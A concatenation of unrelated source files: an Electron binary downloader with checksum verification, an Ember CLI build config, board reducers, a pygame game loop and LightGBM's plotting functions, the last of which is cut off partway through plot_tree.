    return process.env.NPM_CONFIG_ELECTRON_CUSTOM_DIR ||
      process.env.npm_config_electron_custom_dir ||
      process.env.npm_package_config_electron_custom_dir ||
      process.env.ELECTRON_CUSTOM_DIR ||
      this.opts.customDir ||
      this.version
  }

  // Final path segment of the download URL (defaults to the asset filename).
  get urlSuffix () {
    return process.env.NPM_CONFIG_ELECTRON_CUSTOM_FILENAME ||
      process.env.npm_config_electron_custom_filename ||
      process.env.npm_package_config_electron_custom_filename ||
      process.env.ELECTRON_CUSTOM_FILENAME ||
      this.opts.customFilename ||
      this.filename
  }

  get arch () {
    return this.opts.arch || arch.host(this.quiet)
  }

  // Cache directory: explicit option/env var, then the legacy ~/.electron dir
  // (only if it already holds this file), otherwise the XDG/OS cache location.
  get cache () {
    const cacheLocation = this.opts.cache || process.env.ELECTRON_CACHE
    if (cacheLocation) return cacheLocation
    const oldCacheDirectory = path.join(os.homedir(), './.electron')
    if (pathExists.sync(path.join(oldCacheDirectory, this.filename))) {
      return oldCacheDirectory
    }
    // use passed argument or XDG environment variable fallback to OS default
    return envPaths('electron', {suffix: ''}).cache
  }

  get cachedChecksum () {
    return path.join(this.cache, `${this.checksumFilename}-${this.version}`)
  }

  get cachedZip () {
    return path.join(this.cache, this.filename)
  }

  get checksumFilename () {
    return 'SHASUMS256.txt'
  }

  get checksumUrl () {
    return `${this.baseUrl}${this.middleUrl}/${this.checksumFilename}`
  }

  // Asset filename, depending on which artifact flag is set.
  get filename () {
    const type = `${this.platform}-${this.arch}`
    const suffix = `v${this.version}-${type}`
    if (this.chromedriver) {
      // Chromedriver started using Electron's version in asset name in 1.7.0
      if (semver.gte(this.version, '1.7.0')) {
        return `chromedriver-${suffix}.zip`
      } else {
        return `chromedriver-v2.21-${type}.zip`
      }
    } else if (this.mksnapshot) {
      return `mksnapshot-${suffix}.zip`
    } else if (this.ffmpeg) {
      return `ffmpeg-${suffix}.zip`
    } else if (this.symbols) {
      return `electron-${suffix}-symbols.zip`
    } else if (this.dsym) {
      return `electron-${suffix}-dsym.zip`
    } else {
      return `electron-${suffix}.zip`
    }
  }

  get platform () {
    return this.opts.platform || os.platform()
  }

  // Proxy from npm config; https-proxy wins over proxy when both are set.
  get proxy () {
    let proxy
    if (this.npmrc && this.npmrc.proxy) proxy = this.npmrc.proxy
    if (this.npmrc && this.npmrc['https-proxy']) proxy = this.npmrc['https-proxy']
    return proxy
  }

  // Quiet also when stdout is not a real terminal (no rows reported).
  get quiet () {
    return this.opts.quiet || process.stdout.rows < 1
  }

  get strictSSL () {
    let strictSSL = true
    if (this.opts.strictSSL === false || this.npmrc['strict-ssl'] === false) {
      strictSSL = false
    }
    return strictSSL
  }

  get force () {
    return this.opts.force || false
  }

  get symbols () {
    return this.opts.symbols || false
  }

  get dsym () {
    return this.opts.dsym || false
  }

  get chromedriver () {
    return this.opts.chromedriver || false
  }

  get mksnapshot () {
    return this.opts.mksnapshot || false
  }

  get ffmpeg () {
    return this.opts.ffmpeg || false
  }

  get url () {
    return process.env.ELECTRON_DOWNLOAD_OVERRIDE_URL ||
      `${this.baseUrl}${this.middleUrl}/${this.urlSuffix}`
  }

  // Checksums were first published in Electron 1.3.2.
  get verifyChecksumNeeded () {
    return !this.opts.disableChecksumSafetyCheck && semver.gte(this.version, '1.3.2')
  }

  get version () {
    return this.opts.version
  }

  get headers () {
    return this.opts.headers
  }

  // Verify against a cached checksum file if present (and not forced),
  // otherwise download a fresh one first.
  checkForCachedChecksum (cb) {
    pathExists(this.cachedChecksum)
      .then(exists => {
        if (exists && !this.force) {
          this.verifyChecksum(cb)
        } else {
          this.downloadChecksum(cb)
        }
      })
  }

  // Use the cached zip when allowed; otherwise download (or fail when
  // autoDownload is off).
  checkForCachedZip (cb) {
    pathExists(this.cachedZip).then(exists => {
      if (exists && !this.force) {
        debug('zip exists', this.cachedZip)
        this.checkIfZipNeedsVerifying(cb)
      } else if (this.opts.autoDownload) {
        this.ensureCacheDir(cb)
      } else {
        cb(new Error(`File: "${this.cachedZip}" does not exist locally and autoDownload is false`))
      }
    })
  }

  checkIfZipNeedsVerifying (cb) {
    if (this.verifyChecksumNeeded) {
      debug('Verifying zip with checksum')
      return this.checkForCachedChecksum(cb)
    }
    return cb(null, this.cachedZip)
  }

  // Create the cache dir, falling back to ./.electron on permission errors.
  createCacheDir (cb) {
    fs.mkdirs(this.cache, (err) => {
      if (err) {
        if (err.code !== 'EACCES') return cb(err)
        // try local folder if homedir is off limits (e.g. some linuxes return '/' as homedir)
        const localCache = path.resolve('./.electron')
        return fs.mkdirs(localCache, function (err) {
          if (err) return cb(err)
          cb(null, localCache)
        })
      }
      cb(null, this.cache)
    })
  }

  downloadChecksum (cb) {
    this.downloadFile(this.checksumUrl, this.cachedChecksum, cb, this.verifyChecksum.bind(this))
  }

  // Download `url` to a unique temp file in the cache dir, then move it to
  // its final cache name on success.
  downloadFile (url, cacheFilename, cb, onSuccess) {
    const tempFileName = `tmp-${process.pid}-${(ElectronDownloader.tmpFileCounter++).toString(16)}-${path.basename(cacheFilename)}`
    debug('downloading', url, 'to', this.cache)
    const nuggetOpts = {
      target: tempFileName,
      dir: this.cache,
      resume: true,
      quiet: this.quiet,
      strictSSL: this.strictSSL,
      proxy: this.proxy,
      headers: this.headers
    }
    nugget(url, nuggetOpts, (errors) => {
      if (errors) {
        // nugget returns an array of errors but we only need 1st because we only have 1 url
        return this.handleDownloadError(cb, errors[0])
      }
      this.moveFileToCache(tempFileName, cacheFilename, cb, onSuccess)
    })
  }

  downloadIfNotCached (cb) {
    if (!this.version) return cb(new Error('must specify version'))
    debug('info', {cache: this.cache, filename: this.filename, url: this.url})
    this.checkForCachedZip(cb)
  }

  downloadZip (cb) {
    this.downloadFile(this.url, this.cachedZip, cb, this.checkIfZipNeedsVerifying.bind(this))
  }

  ensureCacheDir (cb) {
    debug('creating cache dir')
    this.createCacheDir((err, actualCache) => {
      if (err) return cb(err)
      this.opts.cache = actualCache // in case cache dir changed
      this.downloadZip(cb)
    })
  }

  // Rewrite 404s into a friendlier "version not found" message.
  handleDownloadError (cb, error) {
    if (error.message.indexOf('404') === -1) return cb(error)
    if (this.symbols) {
      error.message = `Failed to find Electron symbols v${this.version} for ${this.platform}-${this.arch} at ${this.url}`
    } else {
      error.message = `Failed to find Electron v${this.version} for ${this.platform}-${this.arch} at ${this.url}`
    }
    return cb(error)
  }

  moveFileToCache (filename, target, cb, onSuccess) {
    const cache = this.cache
    debug('moving', filename, 'from', cache, 'to', target)
    fs.rename(path.join(cache, filename), target, (err) => {
      if (err) {
        // BUGFIX: remove the leftover temp file inside the cache dir; the
        // previous code passed the cache *directory* path to fs.unlink.
        fs.unlink(path.join(cache, filename), cleanupError => {
          try {
            if (cleanupError) {
              console.error(`Error deleting cache file: ${cleanupError.message}`)
            }
          } finally {
            // Report the original rename error regardless of cleanup outcome.
            cb(err)
          }
        })
      } else {
        onSuccess(cb)
      }
    })
  }

  // Validate the cached zip against the cached SHASUMS256.txt.
  verifyChecksum (cb) {
    const options = {}
    if (semver.lt(this.version, '1.3.5')) {
      options.defaultTextEncoding = 'binary'
    }
    const checker = new sumchecker.ChecksumValidator('sha256', this.cachedChecksum, options)
    checker.validate(this.cache, this.filename).then(() => {
      cb(null, this.cachedZip)
    }, (err) => {
      // A failed check means a corrupt download: delete it so the next run
      // re-downloads instead of re-failing on the same bytes.
      fs.unlink(this.cachedZip, (fsErr) => {
        if (fsErr) return cb(fsErr)
        cb(err)
      })
    })
  }
}
ElectronDownloader.tmpFileCounter = 0
module.exports = function download (opts, cb) {
try {
const downloader = new ElectronDownloader(opts)
downloader.downloadIfNotCached(cb)
} catch (err) {
cb(err)
}
}
|
/* global require, module */
var EmberApp = require('ember-cli/lib/broccoli/ember-app');
module.exports = function(defaults) {
var app = new EmberApp(defaults, {
sassOptions: {
extension: 'sass'
}
});
// Use `app.import` to add additional libraries to the generated
// output files.
//
// If you need to use different assets in different
// environments, specify an object as the first parameter. That
// object's keys should be the environment name and the values
// should be the asset to use in that environment.
//
// If the library that you are including contains AMD or ES6
// modules that you would like to import into your application
// please specify an object with the list of modules as keys
// along with the exports of each module as its value.
app.import('bower_components/moment/moment.js');
return app.toTree();
};
|
export const setBoards = (state, action) => {
const { boards } = action;
return {
...state,
isFetching: false,
fetched: true,
data: boards,
};
};
export const setVisibilityRegistrationForm = (state, action) => {
const { value } = action;
return {
...state,
showRegistrationForm: value,
};
};
export const addCreatedBoard = (state, action) => {
const { board } = action;
return {
...state,
data: [...state.data, board],
};
};
export const deleteBoard = (state, action) => {
const { deletedBoardId } = action;
const newBoards = state.data.filter(({ _id }) => _id !== deletedBoardId);
return {
...state,
data: newBoards,
};
};
export const setError = (state, action) => {
const { error } = action;
return {
...state,
isFetching: false,
error,
};
};
export const updatePictureOfBoard = (state, action) => {
const { boardId, newPicture } = action;
const newData = state.data.map((board) => {
if (board._id === boardId) board.picture = newPicture;
return board;
});
return {
...state,
data: newData,
};
};
|
import sys
import pygame
from settings import Settings
from ship import Ship
import game_functions as gf
def run_game():
    """Initialize the game, create the screen objects, and run the main loop."""
    # Initialize pygame and create the main display surface.
    pygame.init()
    ai_setting = Settings()
    screen = pygame.display.set_mode(
        (ai_setting.screen_width, ai_setting.screen_height))
    pygame.display.set_caption("Alien Invasion")
    # Create the player's ship.
    ship = Ship(ai_setting, screen)
    # Main game loop.
    while True:
        # Watch for keyboard and mouse events.
        gf.check_events(ship)
        ship.update()
        # Redraw the screen on each pass through the loop.
        gf.update_screen(ai_setting, screen, ship)


# BUGFIX: guard the entry point so importing this module does not launch the
# game window as a side effect; running the script directly behaves as before.
if __name__ == '__main__':
    run_game()
|
# coding: utf-8
"""Plotting library."""
from copy import deepcopy
from io import BytesIO
from typing import Any, Dict, List, Optional, Tuple, Union
import numpy as np
from .basic import Booster, _log_warning
from .compat import GRAPHVIZ_INSTALLED, MATPLOTLIB_INSTALLED
from .sklearn import LGBMModel
def _check_not_tuple_of_2_elements(obj: Any, obj_name: str = 'obj') -> None:
"""Check object is not tuple or does not have 2 elements."""
if not isinstance(obj, tuple) or len(obj) != 2:
raise TypeError(f"{obj_name} must be a tuple of 2 elements.")
def _float2str(value: float, precision: Optional[int] = None) -> str:
return (f"{value:.{precision}f}"
if precision is not None and not isinstance(value, str)
else str(value))
def plot_importance(
    booster: Union[Booster, LGBMModel],
    ax=None,
    height: float = 0.2,
    xlim: Optional[Tuple[float, float]] = None,
    ylim: Optional[Tuple[float, float]] = None,
    title: Optional[str] = 'Feature importance',
    xlabel: Optional[str] = 'Feature importance',
    ylabel: Optional[str] = 'Features',
    importance_type: str = 'auto',
    max_num_features: Optional[int] = None,
    ignore_zero: bool = True,
    figsize: Optional[Tuple[float, float]] = None,
    dpi: Optional[int] = None,
    grid: bool = True,
    precision: Optional[int] = 3,
    **kwargs: Any
) -> Any:
    """Plot model's feature importances.

    Parameters
    ----------
    booster : Booster or LGBMModel
        Booster or LGBMModel instance which feature importance should be plotted.
    ax : matplotlib.axes.Axes or None, optional (default=None)
        Target axes instance.
        If None, new figure and axes will be created.
    height : float, optional (default=0.2)
        Bar height, passed to ``ax.barh()``.
    xlim : tuple of 2 elements or None, optional (default=None)
        Tuple passed to ``ax.xlim()``.
    ylim : tuple of 2 elements or None, optional (default=None)
        Tuple passed to ``ax.ylim()``.
    title : str or None, optional (default="Feature importance")
        Axes title.
        If None, title is disabled.
    xlabel : str or None, optional (default="Feature importance")
        X-axis title label.
        If None, title is disabled.
        @importance_type@ placeholder can be used, and it will be replaced with the value of ``importance_type`` parameter.
    ylabel : str or None, optional (default="Features")
        Y-axis title label.
        If None, title is disabled.
    importance_type : str, optional (default="auto")
        How the importance is calculated.
        If "auto", if ``booster`` parameter is LGBMModel, ``booster.importance_type`` attribute is used; "split" otherwise.
        If "split", result contains numbers of times the feature is used in a model.
        If "gain", result contains total gains of splits which use the feature.
    max_num_features : int or None, optional (default=None)
        Max number of top features displayed on plot.
        If None or <1, all features will be displayed.
    ignore_zero : bool, optional (default=True)
        Whether to ignore features with zero importance.
    figsize : tuple of 2 elements or None, optional (default=None)
        Figure size.
    dpi : int or None, optional (default=None)
        Resolution of the figure.
    grid : bool, optional (default=True)
        Whether to add a grid for axes.
    precision : int or None, optional (default=3)
        Used to restrict the display of floating point values to a certain precision.
    **kwargs
        Other parameters passed to ``ax.barh()``.

    Returns
    -------
    ax : matplotlib.axes.Axes
        The plot with model's feature importances.
    """
    # Import lazily so the library works without matplotlib installed.
    if MATPLOTLIB_INSTALLED:
        import matplotlib.pyplot as plt
    else:
        raise ImportError('You must install matplotlib and restart your session to plot importance.')
    # Normalize the input down to a raw Booster, resolving 'auto' importance.
    if isinstance(booster, LGBMModel):
        if importance_type == "auto":
            importance_type = booster.importance_type
        booster = booster.booster_
    elif isinstance(booster, Booster):
        if importance_type == "auto":
            importance_type = "split"
    else:
        raise TypeError('booster must be Booster or LGBMModel.')
    importance = booster.feature_importance(importance_type=importance_type)
    feature_name = booster.feature_name()
    if not len(importance):
        raise ValueError("Booster's feature_importance is empty.")
    # Sort ascending so the most important feature ends up at the top of barh;
    # the [-max_num_features:] slice below then keeps the top features.
    tuples = sorted(zip(feature_name, importance), key=lambda x: x[1])
    if ignore_zero:
        tuples = [x for x in tuples if x[1] > 0]
    if max_num_features is not None and max_num_features > 0:
        tuples = tuples[-max_num_features:]
    labels, values = zip(*tuples)
    if ax is None:
        if figsize is not None:
            _check_not_tuple_of_2_elements(figsize, 'figsize')
        _, ax = plt.subplots(1, 1, figsize=figsize, dpi=dpi)
    ylocs = np.arange(len(values))
    ax.barh(ylocs, values, align='center', height=height, **kwargs)
    # Annotate each bar with its value; 'gain' importances are floats and are
    # rounded to `precision` digits, 'split' counts are printed as-is.
    for x, y in zip(values, ylocs):
        ax.text(x + 1, y,
                _float2str(x, precision) if importance_type == 'gain' else x,
                va='center')
    ax.set_yticks(ylocs)
    ax.set_yticklabels(labels)
    if xlim is not None:
        _check_not_tuple_of_2_elements(xlim, 'xlim')
    else:
        # Leave 10% headroom past the largest bar for the value labels.
        xlim = (0, max(values) * 1.1)
    ax.set_xlim(xlim)
    if ylim is not None:
        _check_not_tuple_of_2_elements(ylim, 'ylim')
    else:
        ylim = (-1, len(values))
    ax.set_ylim(ylim)
    if title is not None:
        ax.set_title(title)
    if xlabel is not None:
        xlabel = xlabel.replace('@importance_type@', importance_type)
        ax.set_xlabel(xlabel)
    if ylabel is not None:
        ax.set_ylabel(ylabel)
    ax.grid(grid)
    return ax
def plot_split_value_histogram(
    booster: Union[Booster, LGBMModel],
    feature: Union[int, str],
    bins: Union[int, str, None] = None,
    ax=None,
    width_coef: float = 0.8,
    xlim: Optional[Tuple[float, float]] = None,
    ylim: Optional[Tuple[float, float]] = None,
    title: Optional[str] = 'Split value histogram for feature with @index/name@ @feature@',
    xlabel: Optional[str] = 'Feature split value',
    ylabel: Optional[str] = 'Count',
    figsize: Optional[Tuple[float, float]] = None,
    dpi: Optional[int] = None,
    grid: bool = True,
    **kwargs: Any
) -> Any:
    """Plot split value histogram for the specified feature of the model.

    Parameters
    ----------
    booster : Booster or LGBMModel
        Booster or LGBMModel instance of which feature split value histogram should be plotted.
    feature : int or str
        The feature name or index the histogram is plotted for.
        If int, interpreted as index.
        If str, interpreted as name.
    bins : int, str or None, optional (default=None)
        The maximum number of bins.
        If None, the number of bins equals number of unique split values.
        If str, it should be one from the list of the supported values by ``numpy.histogram()`` function.
    ax : matplotlib.axes.Axes or None, optional (default=None)
        Target axes instance.
        If None, new figure and axes will be created.
    width_coef : float, optional (default=0.8)
        Coefficient for histogram bar width.
    xlim : tuple of 2 elements or None, optional (default=None)
        Tuple passed to ``ax.xlim()``.
    ylim : tuple of 2 elements or None, optional (default=None)
        Tuple passed to ``ax.ylim()``.
    title : str or None, optional (default="Split value histogram for feature with @index/name@ @feature@")
        Axes title.
        If None, title is disabled.
        @feature@ placeholder can be used, and it will be replaced with the value of ``feature`` parameter.
        @index/name@ placeholder can be used,
        and it will be replaced with ``index`` word in case of ``int`` type ``feature`` parameter
        or ``name`` word in case of ``str`` type ``feature`` parameter.
    xlabel : str or None, optional (default="Feature split value")
        X-axis title label.
        If None, title is disabled.
    ylabel : str or None, optional (default="Count")
        Y-axis title label.
        If None, title is disabled.
    figsize : tuple of 2 elements or None, optional (default=None)
        Figure size.
    dpi : int or None, optional (default=None)
        Resolution of the figure.
    grid : bool, optional (default=True)
        Whether to add a grid for axes.
    **kwargs
        Other parameters passed to ``ax.bar()``.

    Returns
    -------
    ax : matplotlib.axes.Axes
        The plot with specified model's feature split value histogram.
    """
    # Import lazily so the library works without matplotlib installed.
    if MATPLOTLIB_INSTALLED:
        import matplotlib.pyplot as plt
        from matplotlib.ticker import MaxNLocator
    else:
        raise ImportError('You must install matplotlib and restart your session to plot split value histogram.')
    if isinstance(booster, LGBMModel):
        booster = booster.booster_
    elif not isinstance(booster, Booster):
        raise TypeError('booster must be Booster or LGBMModel.')
    hist, bins = booster.get_split_value_histogram(feature=feature, bins=bins, xgboost_style=False)
    if np.count_nonzero(hist) == 0:
        raise ValueError('Cannot plot split value histogram, '
                         f'because feature {feature} was not used in splitting')
    # Bars are centred on each bin and scaled relative to the bin width.
    width = width_coef * (bins[1] - bins[0])
    centred = (bins[:-1] + bins[1:]) / 2
    if ax is None:
        if figsize is not None:
            _check_not_tuple_of_2_elements(figsize, 'figsize')
        _, ax = plt.subplots(1, 1, figsize=figsize, dpi=dpi)
    ax.bar(centred, hist, align='center', width=width, **kwargs)
    if xlim is not None:
        _check_not_tuple_of_2_elements(xlim, 'xlim')
    else:
        # Pad 20% of the data range on each side by default.
        range_result = bins[-1] - bins[0]
        xlim = (bins[0] - range_result * 0.2, bins[-1] + range_result * 0.2)
    ax.set_xlim(xlim)
    # Counts are integers, so force integer ticks on the y-axis.
    ax.yaxis.set_major_locator(MaxNLocator(integer=True))
    if ylim is not None:
        _check_not_tuple_of_2_elements(ylim, 'ylim')
    else:
        ylim = (0, max(hist) * 1.1)
    ax.set_ylim(ylim)
    if title is not None:
        title = title.replace('@feature@', str(feature))
        title = title.replace('@index/name@', ('name' if isinstance(feature, str) else 'index'))
        ax.set_title(title)
    if xlabel is not None:
        ax.set_xlabel(xlabel)
    if ylabel is not None:
        ax.set_ylabel(ylabel)
    ax.grid(grid)
    return ax
def plot_metric(
booster: Union[Dict, LGBMModel],
metric: Optional[str] = None,
dataset_names: Optional[List[str]] = None,
ax=None,
xlim: Optional[Tuple[float, float]] = None,
ylim: Optional[Tuple[float, float]] = None,
title: Optional[str] = 'Metric during training',
xlabel: Optional[str] = 'Iterations',
ylabel: Optional[str] = '@metric@',
figsize: Optional[Tuple[float, float]] = None,
dpi: Optional[int] = None,
grid: bool = True
) -> Any:
"""Plot one metric during training.
Parameters
----------
booster : dict or LGBMModel
Dictionary returned from ``lightgbm.train()`` or LGBMModel instance.
metric : str or None, optional (default=None)
The metric name to plot.
Only one metric supported because different metrics have various scales.
If None, first metric picked from dictionary (according to hashcode).
dataset_names : list of str, or None, optional (default=None)
List of the dataset names which are used to calculate metric to plot.
If None, all datasets are used.
ax : matplotlib.axes.Axes or None, optional (default=None)
Target axes instance.
If None, new figure and axes will be created.
xlim : tuple of 2 elements or None, optional (default=None)
Tuple passed to ``ax.xlim()``.
ylim : tuple of 2 elements or None, optional (default=None)
Tuple passed to ``ax.ylim()``.
title : str or None, optional (default="Metric during training")
Axes title.
If None, title is disabled.
xlabel : str or None, optional (default="Iterations")
X-axis title label.
If None, title is disabled.
ylabel : str or None, optional (default="@metric@")
Y-axis title label.
If 'auto', metric name is used.
If None, title is disabled.
@metric@ placeholder can be used, and it will be replaced with metric name.
figsize : tuple of 2 elements or None, optional (default=None)
Figure size.
dpi : int or None, optional (default=None)
Resolution of the figure.
grid : bool, optional (default=True)
Whether to add a grid for axes.
Returns
-------
ax : matplotlib.axes.Axes
The plot with metric's history over the training.
"""
if MATPLOTLIB_INSTALLED:
import matplotlib.pyplot as plt
else:
raise ImportError('You must install matplotlib and restart your session to plot metric.')
if isinstance(booster, LGBMModel):
eval_results = deepcopy(booster.evals_result_)
elif isinstance(booster, dict):
eval_results = deepcopy(booster)
elif isinstance(booster, Booster):
raise TypeError("booster must be dict or LGBMModel. To use plot_metric with Booster type, first record the metrics using record_evaluation callback then pass that to plot_metric as argument `booster`")
else:
raise TypeError('booster must be dict or LGBMModel.')
num_data = len(eval_results)
if not num_data:
raise ValueError('eval results cannot be empty.')
if ax is None:
if figsize is not None:
_check_not_tuple_of_2_elements(figsize, 'figsize')
_, ax = plt.subplots(1, 1, figsize=figsize, dpi=dpi)
if dataset_names is None:
dataset_names = iter(eval_results.keys())
elif not isinstance(dataset_names, (list, tuple, set)) or not dataset_names:
raise ValueError('dataset_names should be iterable and cannot be empty')
else:
dataset_names = iter(dataset_names)
name = next(dataset_names) # take one as sample
metrics_for_one = eval_results[name]
num_metric = len(metrics_for_one)
if metric is None:
if num_metric > 1:
_log_warning("More than one metric available, picking one to plot.")
metric, results = metrics_for_one.popitem()
else:
if metric not in metrics_for_one:
raise KeyError('No given metric in eval results.')
results = metrics_for_one[metric]
num_iteration = len(results)
max_result = max(results)
min_result = min(results)
x_ = range(num_iteration)
ax.plot(x_, results, label=name)
for name in dataset_names:
metrics_for_one = eval_results[name]
results = metrics_for_one[metric]
max_result = max(max(results), max_result)
min_result = min(min(results), min_result)
ax.plot(x_, results, label=name)
ax.legend(loc='best')
if xlim is not None:
_check_not_tuple_of_2_elements(xlim, 'xlim')
else:
xlim = (0, num_iteration)
ax.set_xlim(xlim)
if ylim is not None:
_check_not_tuple_of_2_elements(ylim, 'ylim')
else:
range_result = max_result - min_result
ylim = (min_result - range_result * 0.2, max_result + range_result * 0.2)
ax.set_ylim(ylim)
if ylabel == 'auto':
_log_warning("'auto' value of 'ylabel' argument is deprecated and will be removed in a future release of LightGBM. "
"Use '@metric@' placeholder instead.")
ylabel = '@metric@'
if title is not None:
ax.set_title(title)
if xlabel is not None:
ax.set_xlabel(xlabel)
if ylabel is not None:
ylabel = ylabel.replace('@metric@', metric)
ax.set_ylabel(ylabel)
ax.grid(grid)
return ax
def _to_graphviz(
    tree_info: Dict[str, Any],
    show_info: List[str],
    feature_names: Union[List[str], None],
    precision: Optional[int] = 3,
    orientation: str = 'horizontal',
    constraints: Optional[List[int]] = None,
    **kwargs: Any
) -> Any:
    """Convert specified tree to graphviz instance.

    ``tree_info`` is one entry of ``dump_model()['tree_info']``; ``show_info``
    selects which extra statistics are rendered in each node; ``constraints``
    (one int per feature: 1, -1 or 0) colors split nodes by monotone
    constraint direction; remaining ``**kwargs`` go to the ``Digraph``
    constructor.

    See:
    - https://graphviz.readthedocs.io/en/stable/api.html#digraph
    """
    if GRAPHVIZ_INSTALLED:
        from graphviz import Digraph
    else:
        raise ImportError('You must install graphviz and restart your session to plot tree.')
    def add(root, total_count, parent=None, decision=None):
        """Recursively add node or edge."""
        if 'split_index' in root:  # non-leaf
            l_dec = 'yes'
            r_dec = 'no'
            if root['decision_type'] == '<=':
                lte_symbol = "≤"
                operator = lte_symbol
            elif root['decision_type'] == '==':
                operator = "="
            else:
                raise ValueError('Invalid decision type in tree model.')
            name = f"split{root['split_index']}"
            # Split label: "<feature> <op> <threshold>" in graphviz HTML-like markup.
            if feature_names is not None:
                label = f"<B>{feature_names[root['split_feature']]}</B> {operator}"
            else:
                label = f"feature <B>{root['split_feature']}</B> {operator} "
            label += f"<B>{_float2str(root['threshold'], precision)}</B>"
            # Append any per-node statistics requested via show_info.
            for info in ['split_gain', 'internal_value', 'internal_weight', "internal_count", "data_percentage"]:
                if info in show_info:
                    output = info.split('_')[-1]
                    if info in {'split_gain', 'internal_value', 'internal_weight'}:
                        label += f"<br/>{_float2str(root[info], precision)} {output}"
                    elif info == 'internal_count':
                        label += f"<br/>{output}: {root[info]}"
                    elif info == "data_percentage":
                        label += f"<br/>{_float2str(root['internal_count'] / total_count * 100, 2)}% of data"
            # Color split nodes according to the feature's monotone constraint.
            fillcolor = "white"
            style = ""
            if constraints:
                if constraints[root['split_feature']] == 1:
                    fillcolor = "#ddffdd"  # light green
                if constraints[root['split_feature']] == -1:
                    fillcolor = "#ffdddd"  # light red
                style = "filled"
            label = f"<{label}>"
            graph.node(name, label=label, shape="rectangle", style=style, fillcolor=fillcolor)
            add(root['left_child'], total_count, name, l_dec)
            add(root['right_child'], total_count, name, r_dec)
        else:  # leaf
            name = f"leaf{root['leaf_index']}"
            label = f"leaf {root['leaf_index']}: "
            label += f"<B>{_float2str(root['leaf_value'], precision)}</B>"
            if 'leaf_weight' in show_info:
                label += f"<br/>{_float2str(root['leaf_weight'], precision)} weight"
            if 'leaf_count' in show_info:
                label += f"<br/>count: {root['leaf_count']}"
            if "data_percentage" in show_info:
                label += f"<br/>{_float2str(root['leaf_count'] / total_count * 100, 2)}% of data"
            label = f"<{label}>"
            graph.node(name, label=label)
        # Connect this node to its parent with the yes/no decision as edge label.
        if parent is not None:
            graph.edge(parent, name, decision)
    graph = Digraph(**kwargs)
    rankdir = "LR" if orientation == "horizontal" else "TB"
    graph.attr("graph", nodesep="0.05", ranksep="0.3", rankdir=rankdir)
    # The root's "internal_count" is the total number of training records,
    # used as denominator for data_percentage; a tree without a single split
    # has no "internal_count" and cannot be rendered.
    if "internal_count" in tree_info['tree_structure']:
        add(tree_info['tree_structure'], tree_info['tree_structure']["internal_count"])
    else:
        raise Exception("Cannot plot trees with no split")
    if constraints:
        # "#ddffdd" is light green, "#ffdddd" is light red
        legend = """<
            <TABLE BORDER="0" CELLBORDER="1" CELLSPACING="0" CELLPADDING="4">
             <TR>
              <TD COLSPAN="2"><B>Monotone constraints</B></TD>
             </TR>
             <TR>
              <TD>Increasing</TD>
              <TD BGCOLOR="#ddffdd"></TD>
             </TR>
             <TR>
              <TD>Decreasing</TD>
              <TD BGCOLOR="#ffdddd"></TD>
             </TR>
            </TABLE>
           >"""
        graph.node("legend", label=legend, shape="rectangle", color="white")
    return graph
def create_tree_digraph(
    booster: Union[Booster, LGBMModel],
    tree_index: int = 0,
    show_info: Optional[List[str]] = None,
    precision: Optional[int] = 3,
    orientation: str = 'horizontal',
    **kwargs: Any
) -> Any:
    """Create a digraph representation of specified tree.

    Each node in the graph represents a node in the tree: non-leaf nodes are
    labelled with the split (e.g. ``Column_10 <= 875.9``), leaf nodes with the
    predicted value (e.g. ``leaf 2: 0.422``, where ``2`` is only an internal
    identifier).

    .. note::
        For more information please visit
        https://graphviz.readthedocs.io/en/stable/api.html#digraph.

    Parameters
    ----------
    booster : Booster or LGBMModel
        Booster or LGBMModel instance to be converted.
    tree_index : int, optional (default=0)
        The index of a target tree to convert.
    show_info : list of str, or None, optional (default=None)
        What information should be shown in nodes: ``'split_gain'``,
        ``'internal_value'``, ``'internal_count'``, ``'internal_weight'``,
        ``'leaf_count'``, ``'leaf_weight'``, ``'data_percentage'``.
    precision : int or None, optional (default=3)
        Used to restrict the display of floating point values to a certain precision.
    orientation : str, optional (default='horizontal')
        Orientation of the tree: 'horizontal' or 'vertical'.
    **kwargs
        Other parameters passed to ``Digraph`` constructor
        (https://graphviz.readthedocs.io/en/stable/api.html#digraph).

    Returns
    -------
    graph : graphviz.Digraph
        The digraph representation of specified tree.
    """
    if isinstance(booster, LGBMModel):
        booster = booster.booster_
    elif not isinstance(booster, Booster):
        raise TypeError('booster must be Booster or LGBMModel.')

    model = booster.dump_model()
    all_trees = model['tree_info']
    if tree_index >= len(all_trees):
        raise IndexError('tree_index is out of range.')

    # dump_model() may omit feature names; constraints default to None.
    names = model.get('feature_names', None)
    monotone_constraints = model.get('monotone_constraints', None)

    return _to_graphviz(all_trees[tree_index], show_info or [], names,
                        precision, orientation, monotone_constraints, **kwargs)
def plot_tree(
    booster: Union[Booster, LGBMModel],
    ax=None,
    tree_index: int = 0,
    figsize: Optional[Tuple[float, float]] = None,
    dpi: Optional[int] = None,
    show_info: Optional[List[str]] = None,
    precision: Optional[int] = 3,
    orientation: str = 'horizontal',
    **kwargs: Any
) -> Any:
    """Plot specified tree.

    Renders the digraph produced by ``create_tree_digraph`` to a PNG image and
    draws it onto a matplotlib axes. Node labels follow the same conventions
    as ``create_tree_digraph`` (splits like ``Column_10 <= 875.9``, leaves
    like ``leaf 2: 0.422``).

    .. note::
        It is preferable to use ``create_tree_digraph()`` because of its
        lossless quality and because its return value renders directly inside
        a Jupyter notebook.

    Parameters
    ----------
    booster : Booster or LGBMModel
        Booster or LGBMModel instance to be plotted.
    ax : matplotlib.axes.Axes or None, optional (default=None)
        Target axes instance. If None, new figure and axes will be created
        (``figsize`` and ``dpi`` configure the new figure).
    tree_index : int, optional (default=0)
        The index of a target tree to plot.
    figsize : tuple of 2 elements or None, optional (default=None)
        Figure size.
    dpi : int or None, optional (default=None)
        Resolution of the figure.
    show_info : list of str, or None, optional (default=None)
        What information should be shown in nodes; forwarded to
        ``create_tree_digraph``.
    precision : int or None, optional (default=3)
        Used to restrict the display of floating point values to a certain precision.
    orientation : str, optional (default='horizontal')
        Orientation of the tree: 'horizontal' or 'vertical'.
    **kwargs
        Other parameters passed to ``Digraph`` constructor.

    Returns
    -------
    ax : matplotlib.axes.Axes
        The plot with single tree.
    """
    if not MATPLOTLIB_INSTALLED:
        raise ImportError('You must install matplotlib and restart your session to plot tree.')
    import matplotlib.image as image
    import matplotlib.pyplot as plt

    if ax is None:
        if figsize is not None:
            _check_not_tuple_of_2_elements(figsize, 'figsize')
        _, ax = plt.subplots(1, 1, figsize=figsize, dpi=dpi)

    digraph = create_tree_digraph(booster=booster, tree_index=tree_index,
                                  show_info=show_info, precision=precision,
                                  orientation=orientation, **kwargs)

